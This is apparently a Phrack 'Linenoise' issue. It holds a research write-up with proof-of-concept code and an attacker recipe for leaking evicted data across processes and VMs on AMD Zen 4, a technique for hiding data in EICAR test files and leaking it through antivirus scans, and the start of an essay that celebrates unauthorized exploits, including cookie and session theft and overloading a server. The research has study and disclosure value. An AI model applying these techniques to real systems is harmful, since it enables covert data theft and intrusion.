                             ==Phrack Inc.==

                Volume 0x10, Issue 0x48, Phile #0x03 of 0x12

|=-----------------------------------------------------------------------=|
|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|
|=-----------------------------------------------------------------------=|

Linenoise is a collection of artifacts that do not fit elsewhere. Short papers, corrections, brain dumps, late papers, etc..... :))

Contents
1 - Barbie Sparkles – Barbie
2 - Another use for the EICAR test file – Peter Ferrie
3 - Hacker: Apotheosis of the Marginalized – Kolloid
4 - A Hacker’s Introduction To CHERI – xcellerator
5 - High-Performance Network Scanning With AF_XDP – c3l3si4n
6 - MMIO in the Middle – b1ack0wl
7 - Shell Your Way to Network Mastery – Gabriel & Thomas
8 - Breaking ToaruOS – NOT / Firzen, Binary Gecko

|=-----------------------------------------------------------------------=|
|=-------------------=[ 1 - Barbie Sparkles ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ barbie ]=-------------------------------=|
|=--------------------=[ [email protected] ]=----------------------=|
|=-----------------------------------------------------------------------=|

--[ 0 - Introduction

For a long time, data held in buffer-like microarchitectural structures was believed to be strictly internal to the CPU and protected by architectural mechanisms built into modern CPUs, many of which lack detailed public documentation. Since 2018, following the Microarchitectural Data Sampling (MDS) attacks [1], the security community has discovered that the contents of such buffers might be inferred or even, under the right circumstances, directly leaked, e.g. by using faulting load instructions or in the shadow of transiently executed flows. These techniques might allow attackers to bypass such architectural mechanisms and other hardware mitigations, e.g. buffer clearing or overwriting.

Many such microarchitectural buffers have been publicly documented by now, and most CPU vendors have deployed mitigations on newer hardware with this new threat model in place. Unfortunately, we show that not all CPU vendors have adopted this new threat vector into their threat model, and some newer architectures are being released with such dangerous behaviors documented.

In this article, we show that it is possible to observe stale data from previously evicted cache entries through an undocumented microarchitectural buffer, which we call the eviction buffer. More specifically, AMD Zen 4 platforms might enable a malicious process to observe data previously evicted from a victim process, even if that victim process has already terminated.
Moreover, unlike most prior data inference attacks on microarchitectural buffers, this behavior has been documented in the official “AMD Zen4 Microarchitecture Documentation” and AMD does not consider it a security concern.

--[ 1 - Background

--[ 1.1 - Memory Types and Performance Optimizations

Modern CPUs support multiple memory types that are configurable by the OS and might be configurable by the VMM. These types determine the cache policy used. There are cacheable memory types like write-back (WB), write-through (WT), and write-protect (WP), and uncacheable memory types like uncacheable (UC) and write-combining (WC). The standard pages created by the OS for userland applications are WB, which allows values to be cached and written back to memory when there is bandwidth for it and the memory in question is not being actively used and updated.

--[ 1.2 - Write-Combining

Write-Combining (WC) is a memory performance optimization technique that combines multiple write operations into a single transaction, which can then be written to memory more efficiently, reducing the number of bus requests required for the write operations. For this, the CPU keeps the modified data of all store operations to a specific cache line in an internal buffer until the data can be committed to memory. Then, the data is flushed from the buffer and committed to external memory. We also note that the __Software Optimization Guide for the AMD Zen4 Microarchitecture (ver. 57647, from January 2023)__ describes, in section 2.13.3 "Write Combine Buffers", the performance improvements made using their aggressively combined write buffers.

--[ 1.3 - Microarchitectural Buffers

Many different microarchitectural structures are used in modern CPUs to store data in transit. Many such structures have been publicly documented, and some of them have even been reverse engineered.
At the same time, several prior research efforts have explored the leakage or inference of data from internal CPU buffers, including Fallout [2], Zombieload [3], and RIDL [4]. Each of these attacks targets a different buffer, e.g. store buffers, load buffers, and fill buffers. Since the security community identified such behaviors, mitigations have been deployed on newer hardware, bearing in mind that such buffers should also be treated as containing assets in the threat model.

In this work, we have identified an undocumented microarchitectural buffer that seems to handle previously evicted cache entries when such entries have been tagged as belonging to uncacheable memory. We call this undocumented microarchitectural structure the _eviction buffer_.

--[ 2 - barbieSparkles

At a high level, barbieSparkles may load data from unintended evicted cache entries in the eviction buffer after we change the memory type to WC. We were able to see this behavior crossing context boundaries: across threads, across cores, and even from VM host to guest.

--[ 2.1 - Eviction Sets

A precondition for barbieSparkles is that the attacker is able to evict cache entries from the victim process. There is plenty of research in this area, ranging from reverse engineering cache sets to more brute-force approaches.

--[ 2.2 - Memory Type Change

Normally, only OS and VMM software have permission to change the memory type of a specific page. For our proof-of-concept, we use the PTEditor library [5]. PTEditor is a library that enables modifying page-table entries at all levels, changing memory types, and other memory manipulation actions through user-level APIs provided by a Linux kernel module.

--[ 2.3 - First Sparkle

Our first sighting of a sparkle occurred by chance, and it was unexpected. We wanted to check whether we could modify the memory type of cacheable memory and validate a cache poisoning behavior. There are many reasons why a modern CPU invalidates and poisons cache lines.
And if one is playing with memory types, why not also check the uncacheable ones? And there it was, when changing the memory type of a process from a cacheable one to WC.

After first spotting it, we began our research by implementing various tests that could give us some insight into what was happening and why. The first test was not perfect:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
We could see some sparkle, but it wasn't clear where and why:
(...)
result targetsrc val: 0x0, access time: 1440
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 675 // the stale value
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42, access time: 495 // the secret value
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 1485
result targetsrc val: 0x0, access time: 540
(...)
So, we went for more statistical testing. Running the code 100 times in a loop of 512 iterations, we would get a one- or two-digit number of hits on the secret. This isn't enough though. If we can see data that isn't supposed to be there, then we want to see it all the time, right?

--[ 2.4 - I See Sparkles EVERYWHERE

From there, we started to check different contexts, trying to figure out where the leakage was coming from. We decided to test whether we could leak across sibling threads on a hyperthreading system. Check the pairs:
$ cat /sys/devices/system/cpu/cpu*/topology/thread_siblings_list
0,8
2,10
3,11
4,12
5,13
6,14
7,15
1,9
And we test two siblings:
$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 1440
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
(...)
$ ./barbiesparkles -c 10 -s 41414141 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x42424242, access time: 630
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x41414141, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x42424242, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x41414141, access time: 540
result targetsrc val: 0x8, access time: 495
result targetsrc val: 0x42424242, access time: 540
result targetsrc val: 0x42424242, access time: 540
(...)
This shows that whatever buffer we are leaking from is shared within the core, at least. Next step: can we leak cross-core?
$ ./barbiesparkles -c 2 -s 43434343 -n 512 -I 100 &>/dev/null
$ ./barbiesparkles -c 3 -s 44444444 -n 512 -I 100 | grep result
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 585
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x44444444, access time: 495
result targetsrc val: 0x0, access time: 495
result targetsrc val: 0x43434343, access time: 585
result targetsrc val: 0x0, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x43434343, access time: 495
result targetsrc val: 0x43434343, access time: 540
result targetsrc val: 0x0, access time: 495
(...)
Huh, so our buffer is shared across all cores? Nice! We also observe that we still get some hits for the value we stored in targetsrc (0x33333333), albeit at a lower hit rate than the secret value. To force the architectural value to be committed, we flush the cache before we change the memory type:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Evict the cache
flush(buf_targetsrc);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
With that, we now get 100% hits on the architectural (0x33) value. This seems deterministic enough to us.
$ ./barbiesparkles -c 2 -s 42424242 -n 512 -I 100 | grep result
(...)
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 495
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 540
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 585
result targetsrc val: 0x33333333, access time: 540
(...)
But remember that we were reading the data AFTER changing the memory type to WC, which assumes that the data shouldn't be present in the cache anymore. Just to be sure that we are seeing the current architectural value of targetsrc, we overwrite it with 0x11 and re-run the tests:
// Populate the cache with cache lines from a WB page by performing normal loads
memset(buf_targetsrc, 0x33);
// Load a secret in a buffer by performing normal loads
memset(buf_secret, secret_val);
// Evict the cache
flush(buf_targetsrc);
// Overwrite buffer with a dummy value
memset(buf_targetsrc, 0x11);
// Change the memory type of the page to WC
entry.pte = ptedit_apply_mt(entry.pte, wc_mt);
// Read from memory corresponding to an entry in the cache.
targetsrc_val = *(volatile uint32_t*) buf_targetsrc;
... and nope. What we are seeing isn't the architectural value - it is the evicted stale value:
$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x33333333 | wc -l
100
And again, 100% hits. Even if we flush the targetsrc buffer (with value 0x33) and overwrite it with the new value (0x11), we still get 100% hits on the value 0x33. We have stale data in place! To confirm that we are seeing only evicted data, we flush it right after overwriting it with 0x11 or after changing the memory type (it doesn't seem to matter at all) and re-run the test:
$ ./barbiesparkles -c 10 -s 42424242 -n 512 -I 100 | grep 0x11111111 | wc -l
100
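
The hit counts in this section come from piping the PoC output through grep and wc. For a fuller picture of one run, every observed value can be tallied at once. The JavaScript below is only a minimal sketch and not part of the PoC: the function names tallyValues and hitRate are hypothetical, and it assumes the output lines look exactly like the "result targetsrc val: ..." lines shown above.

```javascript
// Hypothetical helper (not part of the PoC): tally the values it prints.
// Assumes lines shaped like
//   "result targetsrc val: 0x42424242, access time: 495"
function tallyValues(output) {
  const counts = new Map();
  const re = /^result targetsrc val: (0x[0-9a-fA-F]+), access time: (\d+)/;
  for (const line of output.split("\n")) {
    const m = re.exec(line.trim());
    if (!m) continue; // skip "(...)" and any other non-result line
    const val = m[1].toLowerCase();
    counts.set(val, (counts.get(val) || 0) + 1);
  }
  return counts;
}

// Fraction of result lines that carried the given value (0 if no results).
function hitRate(counts, value) {
  let total = 0;
  for (const n of counts.values()) total += n;
  if (total === 0) return 0;
  return (counts.get(value.toLowerCase()) || 0) / total;
}
```

Calling hitRate(tallyValues(text), "0x33333333") on the captured output of a run gives the share of reads that returned the stale value, which makes it easier to compare the flush and no-flush variants side by side.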

--[ 2.5 - Finding The Sparkles Source

We started with the obvious tests. For example, we mapped the secret buffer pages to the same physical page, and that gave us zero, nada hits, confirming that this wasn’t leaking due to a stale TLB entry. After tons of such tests, we realized we don’t actually know the microarchitectural structure the leak is coming from, so we started calling it the “eviction buffer”.

To leak the stale data, there must be a full physical address tag hit on the eviction buffer. We wrote a PoC for this behavior by tracking the physical memory address throughout the tests and then matching the secret addresses with their respective tags. To get the physical address, we used PTEditor's built-in function ptedit_pte_get_pfn, which returns, as you might expect, the page-frame number.

--[ 3 - Sparkle PoC Recipe

If you want to see your Zen4 platform sparkling for yourself:

1. Create two processes – one is the victim, one is the attacker.
   a. The victim allocates a memory buffer and writes a secret value to it. Then, the victim overwrites the secret in memory, frees the allocated buffer, and exits (yeap, the process doesn’t need to be running)!
   b. The attacker allocates memory in order to reclaim the same physical pages previously used by the victim to write the secret. You can choose your own version for this – allocating tons of memory is legit :)
2. The attacker marks the reclaimed memory as WC and flushes the TLB (making sure that the TLB entry is up-to-date).
3. The attacker reads the memory and gets the secret – all sparkling!

Serving options:

- Overwrite the secret in the victim and terminate the victim process: The attacker is able to leak the secret even if the secret value was previously overwritten architecturally.
- Run the victim and the attacker processes in the same core (sibling threads), in any neighboring core (in the same CPU), or leak between host and guest virtual machine.
- Try it out mixing and matching domains, e.g., VM host and guest.

--[ 4 - Reading the Funny Manual

Before we let you go, it is important to note that the __AMD64 Architecture Programmer's Manual Volume 2: System Programming__ (https://www.amd.com/system/files/TechDocs/24593.pdf) actually documents that we should not play with and switch between cache policies of a specific physical page, quoting:

7.8.7 Changing Memory Type
A physical page should not have differing cacheability types assigned to it
through different virtual mappings; they should be either all of a
cacheable type (WB, WT, WP) or all of a non-cacheable type (UC, WC).
Otherwise, this may result in a loss of cache coherency, leading to stale
data and unpredictable behavior.

So please, you all behave and follow the manual. Otherwise, there will be sparkles.

--[ 6 - References

[1] Intel Corp. (2021-03-11). "Microarchitectural Data Sampling."
[2] Minkin, Marina; Moghimi, Daniel; Lipp, Moritz; Schwarz, Michael; Van Bulck, Jo; Genkin, Daniel; Gruss, Daniel; Piessens, Frank; Sunar, Berk; Yarom, Yuval (2019-05-14). "Fallout: Reading Kernel Writes From User Space"
[3] Schwarz, Michael; Lipp, Moritz; Moghimi, Daniel; Van Bulck, Jo; Stecklina, Julian; Prescher, Thomas; Gruss, Daniel (2019-05-14). "ZombieLoad: Cross-Privilege-Boundary Data Sampling"
[4] van Schaik, Stephan; Milburn, Alyssa; Österlund, Sebastian; Frigo, Pietro; Maisuradze, Giorgi; Razavi, Kaveh; Bos, Herbert; Giuffrida, Cristiano (2019-05-14). "RIDL: Rogue In-Flight Data Load"
[5] Michael Schwarz. PTEditor. https://github.com/misc0110/PTEditor

|=-----------------------------------------------------------------------=|
|=------------=[ 2 - Another use for the EICAR test file ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ Peter Ferrie (qkumba) ]=-----------------------=|
|=-----------------------------------------------------------------------=|

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The EICAR test string, right?
68 bytes
CRC32  6851cf3c
MD5    44d88612fea8a8f36de82e1278abb02f
SHA256 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f

Right?
Right??

No.
It's actually
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
followed by up to 60 bytes of restricted white-space characters.

The allowed white-space characters are
Space
Ctrl-Z
Tab
CR
LF

So?
What if...
Space = 0b, Ctrl-Z = 1b, 60 bits per file, 7.5 bytes
EICAR is now a steganography vehicle

Maybe a bit fancier
Space   %*1*00000
Ctrl-Z  %0*1*1010
Tab     %00*1*000
CR      %001*1*01
LF      %0010*1*0
All five characters have one bit in a unique position
Four bits in a nibble, decoder becomes simpler

60 bits is not enough?
Space  = 0b
Ctrl-Z = 1b
Tab    = 10b
CR     = 11b
120 bits per file, 15 bytes

But wait! There's more!
Any subset of the five characters can represent the zero bit
The rest can represent the one bit
EICAR as *OLIGOMORPHIC* steganography vehicle!

"hello world" (*)
0D200A080D080A1A081A0A1A1A0A080D201A0D0808201A1A201A1A202020200A
1A20200D201A1A2020080D1A08081A200A0A080D1A0A0D
SHA256 6a154634b1be7df212863e486b2b1d0cb842e72c3baef941b1054e50fc08b993

(*) 5-bit text-encoding, one special character; tab/cr/lf=0, space/ctrl-z=1

Or "hello world"
08200A0D0A0D081A08200A1A1A0A0A0A20200D0D08201A1A201A201A201A2008
1A1A1A0D2020201A20080820080A1A20080A0A0D20080D
SHA256 f982fa69f04053060d82aece78df2dbf10b2fcf86e842ffe44fbc287f4f4b92c

Or "hello world"
0A200D0A0A0D0D1A0A1A0A1A1A080D0D20200A0D0D1A201A1A1A1A20201A1A0D
202020081A1A201A1A0D08200D0D1A1A0D080A081A0D08
SHA256 09258537fe9ea0105831873c4fbe8d000e54491fdfe446d7d353544c7b4cf334

The encoder
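function encode(text) {
  // Characters standing for a one bit: space and Ctrl-Z (space is listed
  // twice so that a random index 0..2 works for both tables)
  var s = [" ", "\x1a", " "]
  // Characters standing for a zero bit: tab, CR, LF
  var c = ["\t", "\r", "\n"]
  var t = ""
  for (var x = 0; x < text.length; x++) {
    // Keep the low five bits; 0 (e.g. a space) becomes the special value 31
    var q = text.charCodeAt(x) & 31
    if (!q) q = 31
    // Emit the five bits, most significant first
    for (var b = 32; b >>= 1;)
      t += ((q & b) ? s : c)[Math.floor(Math.random() * 3)]
  }
  return t
}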
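
The receiving side could be sketched as follows. This decoder is not from the original text: the names decodePadding and hexToString are hypothetical, and it assumes that any padding byte other than space or Ctrl-Z is a zero bit, that the values 1..26 map back to lowercase letters, and that 31 is the special value standing for a space.

```javascript
// Hypothetical decoder for the 5-bit padding scheme (a sketch, not the
// author's tool). Assumptions: space/Ctrl-Z = 1, every other byte = 0,
// bits arrive most significant first, 31 decodes to a space.
function decodePadding(pad) {
  let out = "";
  for (let i = 0; i + 5 <= pad.length; i += 5) {
    let q = 0;
    for (let j = 0; j < 5; j++) {
      const ch = pad[i + j];
      q = (q << 1) | ((ch === " " || ch === "\x1a") ? 1 : 0);
    }
    // 96 + q undoes "charCode & 31" for lowercase letters ('a' is 97)
    out += (q === 31) ? " " : String.fromCharCode(96 + q);
  }
  return out;
}

// Turn a hex dump such as "0D200A" into the string of bytes it describes.
function hexToString(hex) {
  let s = "";
  for (let i = 0; i + 2 <= hex.length; i += 2)
    s += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  return s;
}
```

Reading the first "hello world" dump above as one byte per hex pair and passing it through hexToString and then decodePadding gives back the text. Because only the space/Ctrl-Z versus everything-else split matters, the same decoder handles any of the randomized variants produced with this bit assignment.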

Multiple EICAR files mean more data
File naming can define data ordering

1. Create the files on disk
2. Trigger a scan
3. Detections will include the unique file hash

The *anti-malware engine* will leak the data
The files never have to leave the disk

Noisy? Yes
But it only has to work once

|=-----------------------------------------------------------------------=|
|=-----------=[ 3 - Hacker: Apotheosis of the Marginalized ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Kolloid ]=------------------------------=|
|=-----------------------------------------------------------------------=|

--> 01: Introduction

Much like Phrack, I will soon be entering into my 40s. I'm at that stage where I'm reflecting on the rebelliousness of my youth, wondering what it all meant. Some of it brought financial gain, such as the time I found a legitimate exploit that allowed me to win a Mercedes-Benz C-Class. Some of it helped me along my career path, like when I used various social engineering techniques to gain escalated privileges within a Fortune 500 company, enabling me to become a data scientist and submit a patent in applied machine learning despite having no prior experience in the field. Some of it led nowhere at all, like when I discovered a glitch in my stock broker's trading platform that allowed me to borrow over $200K at a negative interest rate until my account was promptly disabled when the risk management team realized what I had done.

Although I fondly reminisce on these events, it's not the outcomes that I find particularly meaningful. Instead, it's what those acts reveal about myself that gives me the greatest meaning: they show that I'm a hacker.

For the longest time, I was hesitant to call myself a hacker. I felt insecure in that identity because I wasn't using rootkits to gain access into systems. I didn't use Linux. I didn't even have a compiler to make executables. Instead, I made simple tools from the resources available to me (i.e., the default programs installed on Windows XP). I mainly worked out of Notepad in my early years, using JavaScript as my language of choice.
I would do things like paste the decoded Base64 binaries of cookies from two different accounts into two different instances of Notepad, flipping back and forth like an animator flipping between pages to identify bit changes. Or I would use frames to pass credentials through the URL, iterating with a script through an array on a timer to visually inspect five frames at a time if any combination in my list would grant me access. Since I wasn't using a "real" programming language, I felt lesser, even though my tools and techniques still enabled me to get what I was seeking and were things made for myself.

Although I did not appreciate it at the time, my janky tools made in Notepad represented the very essence of what made me a hacker. In one form of the definition, a hack is something roughly and hastily done. It is the antithesis of something refined, so it is on the frontier, retaining some uncivilized wildness to it. On the frontier is where we find the hacker, moving the boundaries of society by pushing the system beyond its intended bounds, kicking and screaming all the way into new, unknown territory. In that sense, the hacker is the modern-day embodiment of the mythological trickster figure whose subversive acts keep society lively through the amusement and chaos he brings.

I could not fully embrace my identity as a hacker until I first understood the archetypal role the hacker represented and the mythology I was living out.

"The best way to describe trickster is to say simply that the boundary is where he will be found--sometimes drawing the line, sometimes crossing it, sometimes erasing or moving it, but always there, the god of the threshold in all its forms."
- Lewis Hyde, Trickster Makes This World

--> 02: The Myth of Hermes

"If my father will not give me honors, then I will steal them."
- Hermes

In "Trickster Makes This World," Lewis Hyde retells the story of Hermes, who is the son of Zeus, king of the gods, and a cave nymph by means of an extramarital affair. His questionable birth makes it uncertain if he will become recognized as a god as well. He was born with the stain of illegitimacy but born undeniably exceptional, pointing to his divine ancestry, even if it could not be explicitly stated aloud. He was also born with a certain impulsiveness, so he decides as a day-old baby to steal fifty head of cattle from his half-brother Apollo, claiming that he was hungry for something more substantial than the milk he was given. In doing so, Hermes displays his craftiness by walking the stolen cattle backward and by wearing special sandals he crafted himself to obscure his footprints. When he got back, he slaughtered and cooked two of the cattle but did not eat the meat. Instead, he hid it away and climbed back into his crib.

When Hermes' mother, Maia, discovers what he has done, she questions him by asking how he could be so shameless to do such a thing. Hermes first denies the accusations by saying, "I am just a little baby. How could I possibly have stolen these cattle?" Maia, who sees through her child's attempt at deception, questions Hermes again, who laments in frustration, "Why must we live in this cave when the other gods live on Olympus enjoying the fruits of sacrifices? If my father will not give me honors, then I will steal them."

Apollo eventually notices that some cattle from his herd are gone and also somehow already knows that it was the newly-born Hermes that took them. Apollo tracks down and questions Hermes, who once again responds with, "I am just a little baby. How could I possibly have stolen your cattle?" Apollo threatens to throw baby Hermes into the depths of Tartarus if he does not give him his cattle back, but Hermes does not relent to Apollo. Since neither would concede, Hermes declares that Zeus must judge who is right.
So Apollo drags Hermes up to Olympus to plead his case before their father, telling Zeus of all the cunning details of Hermes' theft that he discovered. For a third time, Hermes proclaims, "I am just a baby. How could I possibly have stolen those cattle?" Zeus is amused at the audacity of the theft and the steadfastness of Hermes' denial, even when caught. So, Zeus begins to laugh. Surely, this is the son of Zeus. Rather than punishment, Zeus orders Hermes to make amends with his brother and show him where the cattle are hidden, revealing his tricks. On their way to the hiding spot, Hermes begins to play the lyre (which he also invented using the shell of a tortoise he killed while on the way to steal the cattle), and Apollo becomes enchanted by its sound, never hearing music before. When they finally reach the missing cattle, Hermes gives the lyre to Apollo as a gift. In return, Apollo gives the cattle to Hermes and a whip to symbolize his now legitimate ownership of them, and the two become friends from that point forward. Hermes is a god of paradoxes, for he is a paradox as well. How is it that Hermes could be the illegitimate son of Zeus, the king of the gods? How could the most legitimate of all the gods produce anything illegitimate? Just by existing, Hermes is a challenge to the order of Olympus, causing trouble on his first day being born. So he lies by saying, "I am just a little baby," but it is a lie that forces others to acknowledge the truth that he is more than just a little baby. He begins to unwind his own paradox. He lures others into engaging with it. If he was just a baby, then he could not have stolen those cattle. If he was something more, then they must admit that he should be elevated, deserving of praise instead of shame. Somehow, through initially stealing those fifty head of cattle, Hermes became recognized as being their rightful owner. 
Coincidentally, he also ended up on Olympus in the presence of his now delighted father, a place he was never meant to be. An illegitimate act set into motion the process of being recognized as legitimate.

Things worked out for Hermes, but one does not always receive honors, even if the things of gods are successfully stolen. Sometimes, the gods are not amused. Sometimes, you are thrown into Tartarus.

--> 03: Tartarus From My First Major Hack

When I was fifteen, I learned through my biology teacher about a website that offered weekly prizes of up to $500 in gift certificates for winning trivia quizzes. After about two hours of repetition for each quiz, I became fast enough to win by recognizing the questions and their answers by the shape of the text and the first few words. The purpose of the website was to promote learning, but the quizzes ended up becoming just a reflex test. I had to answer each question in a second or two, far below the amount of time to even fully read the question. Regardless, I was able to win through the intended means. I could do what I was supposed to do. However, it wasn't sustainable because my vision would go blurry after a few hours of intently staring at my CRT screen flickering at 60 Hz. There had to be a better way that didn't end with me going blind.

As I was lying in bed one evening, a thought came to me: Maybe I could modify the cache file that contained the answers by overwriting the individual characters within the file without changing the overall size of the file. I regularly went through the Temporary Internet Files folder that held the cache for Internet Explorer, so I already discovered the file that contained the answers. Still, I was never able to successfully run modified cache files before. I wondered if there might be some internal validation that checked if the file was the same size as when it was initially downloaded before it ran in Offline Mode to ensure the file had not been corrupted.
So, I got out of bed to give it a try, and this time it finally worked! I now had the ability to change websites (at least how they interacted with me) in any way I saw fit, giving me something I was never meant to have. I would clear my cache, run the quiz once online to download the necessary files, switch to Offline Mode, modify the cache file so that the answers would always show up in the same location instead of a randomized one, retake the quiz, and click on "Yes" when my browser would ask if I wanted to leave Offline Mode when it tried to submit my scores back to the server. This technique worked perfectly, except when I would replace a character with a line return, so I just avoided using them when I modified my files. I would use the same technique later on to spoof file requests to sites that blocked ones from outside of the domain (especially useful for downloading multipart RAR files when paired with a download manager). I found that I could reorder things meant to be difficult to be easier for me so that I no longer needed to sacrifice myself in the process to get them. There was a leaderboard on the site, so I saw that there was one other student who figured out the same trick as me because we were far faster than anyone else. Curiously, my first major hack was the only time I spotted another hacker in the wild. The moment I found myself, I also found another like me, and it was the two of us competing against each other. The rest of the world just fell away. We formed a new game while everyone else blissfully imagined that they were still participating in something that no longer existed. Unfortunately, my downfall began the moment the gift certificates began to arrive. It was real, and I couldn't contain my excitement. I imagine that it was the same feeling as when a child first discovers that he can count to 100, overflowing with pride. I had this new ability that brought tangible rewards, and I began to share the news with my family. 
However, the response was not what I expected it to be. Instead of being met with amazement and congratulations, I was met with disappointment. I was told that what I was doing was wrong and that I should stop immediately. So, I quit and hid my newly discovered talent in shame. I suppose that such an experience is just a rite of passage for the hacker, but I had no one to acknowledge the virtue of such actions. I was not recognized, so I became invisible. I was thrown into Tartarus.

--> 04: Olympus - Finally Being Seen

In my sophomore year in college, I got a job as a software quality tester for a startup after hearing about an opening from a friend who also recently got a job there. I thought it would be exciting to be a part of the Web 2.0 boom, but the job ended up being pretty boring. The entire role was to follow a premade checklist and ensure that everything was functioning as documented. The icon is blue. Check. The icon turns green when clicked. Check. I thought my technical skills would be useful, but this role required no skill at all.

This job was monotonous, and I quickly began suffering from the lack of stimulus. Boredom is a very real form of suffering. I desperately needed something to happen, some randomness, so I began looking for something to break under the guise of "quality assurance." Soon, I found something. I would make something happen.

As was common at that time, the front page of the site said that it was in beta and had a contact form to join the list for the test release. I wondered if the form sent an email or if the submissions were stored in a database. What would happen if I sent a flood of requests? Something would happen, and I would gain some new knowledge of what was going on in the backend. The anticipation of discovery through a bit of mischief was the breath of fresh air I needed. Maybe I would get fired, but this role was already dead to me, so it was worth the risk.
On the Friday before I left work, I placed a stapler on my enter key to continually resubmit the form over the weekend and turned off my monitor. When I got back on Monday, my boss learned what I had done and pulled me aside. He told me that I had overloaded the email server to the point where it started smoking (I'm not sure if that was literal or not). So, I now knew that the form did send out emails, which did indeed mean it was more vulnerable to attacks like the one I just pulled off with a common office stapler. Strangely, I didn't get fired or even reprimanded. Instead, my boss started to tell me about how he used to frequent the old BBSs when he was younger. He was once a hacker from a bygone era and was trying to tell me that he saw me for who I truly was: a hacker like him. I was seen, but it was not with the usual malice I encountered in school when I was younger. I was seen for the qualities that my boss cherished about his younger self and maybe even for ones that he felt were lost somewhere along the way. That recognition was transformative in many ways. Instead of punishment for my actions, my boss gave me a raise and a new title of "software security tester." My role within the system was made anew into something that conformed to who I was instead of being made to conform to something I wasn't. I was allowed to be myself because I was finally seen for who I was, and it was seen as good instead of bad. Most importantly, I was granted the official freedom to create and run my own tests, as opposed to the liberty that I took for myself. Like Hermes, the thing that I stole somehow became legitimately recognized as mine. A job that was inherently lacking creativity was transformed into one of the most creative periods of my life. It was at this job where I used a Base64 encoder/decoder I created in JavaScript to get into other accounts by changing the binary in two locations of the cookie. 
After the developers updated to use sessions, I worked my way up to creating a special email that sent me the session information when users opened it. The web app didn't strip out embedded scripts, so I was able to hijack its functionality to access the cookie and send it to me in an email. My time there became a game of cat and mouse with the architects, transcending the original purpose of simply testing the software. Still, the unintended byproduct of that game was better software.

Things could have gone drastically differently for me, and they did for my friend who introduced me to the company. Frustrated with the tedium of the job, my friend also destroyed some equipment by ripping out keys from his keyboard one day. I was promoted when I destroyed a server, but my friend ended up getting fired when he destroyed his keyboard. Two seemingly similar actions stemming from the same place of discontentment but yielding two completely different outcomes. It's like the story of Cain and Abel, where both brothers offer up a sacrifice. One is looked upon favorably by God, while the other is not, and it's not entirely clear why. If anything, I should have been punished more severely for my more severe transgression, but I was elevated to be something I wasn't before.

--> 05: The Uncertain Fate of the Trickster

Trickster mythology speaks to the question of how one born into the world marked as illegitimate, cut off from the good things of society, becomes legitimate. The answer is that he tricks his way in. He does something that he was not supposed to do, so he ends up passing through where he was meant to be excluded. Sometimes, he succeeds. Sometimes, he doesn't. Yet, he is a trickster because he does what he ought not to do. Often, that trick is exclusively for his own amusement, seemingly without forethought of the potential consequences of his actions. He pushes buttons just to see what will happen.
